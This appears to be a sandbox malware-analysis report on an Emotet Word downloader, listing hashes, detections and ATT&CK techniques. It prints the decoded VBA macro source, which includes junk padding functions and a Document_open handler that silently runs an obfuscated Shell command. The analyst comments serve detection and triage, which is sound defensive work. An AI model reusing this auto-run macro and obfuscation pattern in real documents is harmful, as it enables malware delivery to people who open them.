Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 086d50d91d2eff79…

MALICIOUS

Office (OLE)

Size: 255.5 KB · Created: 2018-07-18 07:03:00 · Authoring application: Microsoft Office Word · First seen: 2018-07-27
MD5: d7d6b2bfb116b8dbbea44b7d6b2cec95
SHA-1: 8016b8703face54adacbf29dbe9c00b0d38c2f33
SHA-256: 086d50d91d2eff79d61b97a95a168c0ff5f99ce34e75a27649ffb68d3ef78ef4
182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 (Visual Basic) · T1059 (Command and Scripting Interpreter) · T1204.002 (Malicious File)

The file is identified as malicious by ClamAV with a specific Emotet signature. Static analysis revealed the presence of VBA macros, including a Document_Open macro and a critical Shell() call, indicating an attempt to execute arbitrary code. This functionality is consistent with Emotet's typical behavior of downloading and executing further malicious payloads.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6958940-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6958940-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard Office Open XML DrawingML namespace that legitimate documents also reference, so on its own it is not an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 56816 bytes
SHA-256: 648843d0e8f25e33e71531a2f56a3d971f9c12919ba9953e9bdc2abfcb334864
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "uhEPuEYHTzNf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Base naming ThisDocument together
' with VB_PredeclaredId = True suggests this is the document's class module,
' which is consistent with the Document_open handler further down — confirm
' against the full extracted macros.bas. The random-looking VB_Name is a
' common triage signal: hand-written modules rarely carry names like this.
' Filler routine. Every assignment below writes to an undeclared local that
' is never read again inside this function, and the function name is never
' assigned, so the call returns Empty. The arithmetic appears to exist only
' to pad the module and obscure the one meaningful routine (Document_open);
' On Error Resume Next swallows the runtime errors these expressions raise
' (e.g. division by zero once uninitialised operands evaluate as 0), assuming
' none of the operands is declared at module level elsewhere in the 56 KB
' source — TODO confirm against the full macros.bas.
Private Function IndbftHBClqM()
On Error Resume Next
   UCwXps = 10770 + SuhQG - (74870 * cObGup / PRpjjz / 48648 + KCMkG - BQvZj - 6722 - jJXCb * (19196 / HcsZv / mhhFII - HkiDVj))
   HwHUo = 50843 + jbROYR - (45195 * zQwGA / pGhzJj / 95666 + NOcCMY - PwuIds - 95095 - LhOBh * (40284 / UAnkRp / UirnI - DlWEz))
   HFPXUc = 53933 + rYwwD - (54444 * VOZdj / fjwzO / 93770 + lWhfp - JOZHF - 79595 - kvFfj * (81437 / fjWQii / bZSZF - ZmUrRG))
   QPwis = 5829 + wpiWV - (4024 * tJnRzz / XPufX / 70255 + GIfhBd - qEALq - 60634 - JSfYb * (87900 / YpVPCv / zBwUSq - jwoTYw))
   jwZuS = 32803 + HZrvJ - (7723 * cnbtFt / dmazQW / 74540 + zJSWr - VWMza - 2176 - GolTuB * (70522 / FAfEt / JwwCu - rZhcnM))
   wjhLma = 60901 + ShInP - (6642 * JnpOfU / pQbGuz / 59164 + juiiJ - LOJSGa - 29496 - AUhDD * (40718 / jRvGQ / Rjffjc - BNEhuk))
End Function
' Filler routine, same pattern as the other junk functions in this module:
' seven assignments to undeclared locals whose values are never read, no
' assignment to the function name (returns Empty), and On Error Resume Next
' so that any runtime error from the uninitialised operands is ignored.
' None of this affects what the document does; it only inflates the module.
Private Function diDJjwmRLckF()
On Error Resume Next
   RbZPkS = 6107 + ZjHdzi - (84023 * dRhji / hRriuV / 12750 + XJiDbt - tUiYVl - 39553 - aZfADK * (2564 / GzktIX / YhibI - vvGzUj))
   csLVXl = 6552 + pEMZo - (27419 * TKJiLr / QAKWzz / 63376 + MHmViI - siFvHI - 26294 - lqpVh * (87482 / FJEBb / LAoEY - sFnSf))
   TASOcr = 69213 + NVdsGf - (908 * bjrXl / nUvEj / 10583 + wUZOV - EYjYV - 1672 - Rifqs * (13317 / KAAOF / zNzSYK - DRBEik))
   qQWTsK = 75895 + NtPnj - (54276 * bVtrPp / CmIDO / 47226 + lFrkl - hWkEfK - 69120 - BBtDV * (22900 / AcMhmb / kKowO - boXDvk))
   koMEF = 91535 + lOAsM - (81534 * diCzQU / ZPivAr / 25670 + qIlNZQ - AchfLw - 93067 - DCsqKs * (217 / TdSKYd / EDnHX - HwQUpi))
   CTBPb = 778 + IVZvLk - (18535 * mNZIj / DfUUK / 37374 + KdTZqj - dvzCp - 76509 - QbHav * (62081 / izsEz / wojvQj - zrFVVE))
   IIvNkR = 18709 + VDmWL - (53086 * rAYVS / qnKMi / 59916 + ZCibDw - rpjXGr - 17984 - fommT * (85785 / zwNip / UlACm - pSULSN))
End Function
' Filler routine (junk arithmetic, results discarded, returns Empty).
' The third line differs in shape from the others — a plain parenthesised
' expression rather than the usual "a + b - (...)" template — which suggests
' the generator varies its templates; signatures keyed on the exact
' expression form will be brittle, whereas the Shell call in Document_open
' and the On Error Resume Next / undeclared-variable pattern are stable.
Private Function hzXczflhKP()
On Error Resume Next
   IQoui = 5559 + mKAPL - (4076 * QDwQB / CFUtit / 57727 + BhrBO - KYKNi - 30362 - jmXjZ * (72450 / ocpCGw / DvvQk - qkcIO))
   mdjUFK = 18114 + ivscE - (62082 * JiKMU / UjLYUW / 42746 + CHZUK - CtpPh - 33095 - iWKJI * (39383 / pzIIS / SwYwl - nFjoTI))
   lkGor = (73673 - fEuIlw - 27381 + 20244 / XBEjZt - BHfcK / 40808 + ajQRCl - (23504 / iwdSU))
   AGOvoZ = 49947 + dpwwnr - (63789 * sqRiR / DvXDB / 41049 + lrSsw - fKHNma - 15429 - EJFsZk * (8111 / Ozrif / SXkYE - rwiFrz))
   aDNWi = 63469 + RLClYv - (96648 * AIjEPW / rNaQm / 62718 + flTwu - diNjzB - 53702 - Rnlmzj * (28401 / umYCCM / wOuGE - QSbAFQ))
   rrtlmm = 73826 + TwNFI - (87098 * ZspuQA / dOztq / 34611 + JORbst - iDPTMm - 69951 - hKcfPK * (70706 / ThskN / otvUZK - vdPAdq))
End Function
' Auto-execution entry point. Word invokes Document_open as soon as the
' document is opened with macros enabled (ATT&CK T1204.002 -> T1059.005);
' this is the only routine in the preview that has a real effect. The three
' assignments before the Shell call and the one after it are the same junk
' arithmetic used by the filler functions, and their results are discarded.
Private Sub Document_open()
On Error Resume Next
   hFwwh = 85001 * ncqYZ * (19209 - 52104 / vMzAzb * 93779 + 62855 - ChHHXw - 13429 - Kviip)
   wRAdd = 19304 * jsLCN * (72744 - 26533 / jTiFzL * 45572 + 98915 - DmjDX - 51916 - UwYFAZ)
   GVPQUv = 65643 * wofiz * (62007 - 23489 / lXjBS * 49870 + 3514 - KWjKAv - 71432 - wvIlmR)
' The command line is built by concatenating roughly thirty identifiers; none
' of them is assigned anywhere in the visible preview, and CVar("c") is the
' only literal fragment. The real string therefore cannot be read off this
' excerpt — recover it from the full extracted macros.bas (the identifiers
' are presumably set elsewhere in the 56 KB module) or from a sandbox run
' that logs Shell's argument; do not assume it is empty. The trailing 0 is
' the vbHide window style, so the spawned process shows no window.
' Detection angle: the Word process creating a child process right after the
' document is opened, with On Error Resume Next hiding any failure.
Shell "" + rziiKtt + SUSSpjkYTuzlwP + CVar("c") + VOOsOGChuGiR + IoOMEdokV + TzZKaD + diAOErhdzvs + OQQLaYbWwY + cGFdzh + zFTJOR + kdrbu + bCTYd + KwccufCmaC + MQBTGJw + URNYi + wJZUkarv + UnEZus + GYLbRiH + KmpHbDFPv + SfERZzc + BzLqDwjDX + GlhYZuLS + fBDRCzJu + nNjoPvjdIHu + kOMlwhJvY + zlFJUjKATl + iEfnPYzu + sUDQU + AfzvfwdOokO + GDRosXH + cRHLczYSw, 0
   dLIRfi = 32132 * IdGvW * (10639 - 83097 / FKKfi * 91270 + 75928 - JXJTZh - 66763 - wQWvuA)
End Sub
Private Function iNAODijP()
On Error Resume Next
   YKVNG = XuLaDU - 74772 - 68394 / qfCqR + (13589 - OIzPv - sFcMJu + VBatAf)
   mmmNS = TUJdP - 32348 - 48008 / CTiww + (26407 - zDjWnz - DCcBIb + GomsVB)
   fwuiJ = iHOFG - 16126 - 50239 / Hucma + (49226 - btazLW - JOBal + KirZKY)
   kfzjf = GTYUcm - 37690 - 41082 / ivYAR + (31193 - FpblEU - zaAssV + LbPlPq)
End Func
... (truncated)